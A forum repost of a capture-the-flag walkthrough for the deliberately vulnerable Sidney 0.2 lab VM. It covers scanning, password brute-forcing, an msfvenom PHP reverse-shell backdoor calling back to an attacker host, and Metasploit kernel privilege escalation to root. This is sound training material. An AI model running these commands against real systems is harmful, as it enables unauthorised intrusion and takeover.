• We just launched and are currently in beta. Join us as we build and grow the community.

Hack the Sidney VM (CTF Challenge)

XxDat-WayxX

Clown Prince
X
X Rep
0
0
0
Rep
0
X Vouches
0
0
0
Vouches
0
Posts
155
Likes
35
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
Today we will take up a boot2root challenge by Nightmares.We will work on Sidney: 0.2 made by Nightmares. This is the third challenge he genially came up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag. You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/

Breaching Methodologies:
  • Network Scanning (Nmap, netdiscover)
  • webserver enumeration (view source)
  • Directory brute-force (dirb)
  • Generate own Dictionary (crunch)
  • Login into the admin console
  • Generate PHP Backdoor (Msfvenom)
  • Upload and execute a backdoor
  • Reverse connection (Metasploit)
  • Kernel privilege escalation (Metasploit)
  • Gain root access
  • Penetrate for flag.zip
  • Access Ram and finished the task

First things we need to know what IP did the VM got. So naturally, scan the network using:

Code: 
netdiscover

1.png


Now that we have located our target IP i.e. 192.168.1.103, our next step is to scan it.

Code: 
nmap -A -p- 192.168.1.103

2.png


Upon scanning we know that port number 80 is open that means this IP will open in the browser so let us try and do that.

3.png


Then we decided to look into its page source.

4.png


So we opened it in the browser (192.168.1.103/commorode64) and to our luck, we found another page.

5.png


As you will read the page source you will come to know that username is robhubbard and going further you will find some hints about the password i.e. :

  • the password is in lowercase
  • the password has 3 letters and four digits
  • and it is related to c=64 sound chip

6.png


Then we run dirb for web directory brute-force attack and here it has shown so many directories. But I was interested in index.php and decide to explore it.

7.png


So we opened it and as you can see it is asking for username and password. Now, we already know what is the username, we just have to find the password.

8.png


Getting the above hints about the password, we first decided to look up the c=64 sound chip on Wikipedia. And we found:

9.png


We knew that password’s first three digits are alphabetic letters and so our best guess is MOS is the first three digits of the password.

Now everything falls on the last four digits of the password and finds that we used crunch command.

Code: 
crunch 7 7 -t mos%%%% -o /root/Desktop/dict.txt

10.png


Crunch will generate your dictionary file.

And then apply dictionary attack using Burp Suite and then it will result in showing you the password as shown below:

11.png


Now on the index.php page enter the username and password. The following page will open and on this page, you have to upload a malicious php file.

12.png


Entering the password you will login to the following page:

13.png


Now to generate the said php open the terminal in your Kali and type:

Code: 
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

Simultaneously start multi handler inside Metasploit framework.

14.png


Copy the code from <?php to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.

15.png


Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.

Code: 
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.

16.png


By executing sysinfo we came to know about the target’s architecture i.e. kernel 4.4, and with help of this, we found Metasploit exploit for kernel privilege escalation. Further type following command:

Code: 
use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set session 1
msf exploit(linux/local/bpf_priv_esc) > set lhost 192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport 8888
msf exploit(linux/local/bpf_priv_esc) > exploit

And it will give a 2nd meterpreter session with root privilege, now let’s get into the root directory and capture the flag.

Code: 
cd /root
ls

18.png


It gave us a hint.gif file, let’s download it.

Code: 
download hint.gif /root/Desktop/

19.1.png


So when we opened hint.gif it has shown below image and I was unable to take-out hint from their conversation.

19.2.png


Further, I execute the following command:

Code: 
cd .commodor64
ls
cd .miami
ls
cd vice
ls

Here is flag.zip file let’s download it on our desktop with help of the following command:

Code: 
download flag.zip /root/Desktop/

19.png


We will apply dictionary attack using rockyou.txt so for this the command is:

Code: 
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip

And yes, at last, you have the password. So now unzip the flag.zip by typing:

Code: 
unzip flag.zip

Then it will ask you the password. Enter the recently obtained password here.

21.png


And YAY!!!!! We have captured the Flag!!! Enjoy with it.

22.png


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
 
You must log in or register to reply here.

452,292

324,736

324,744

R rathi
Top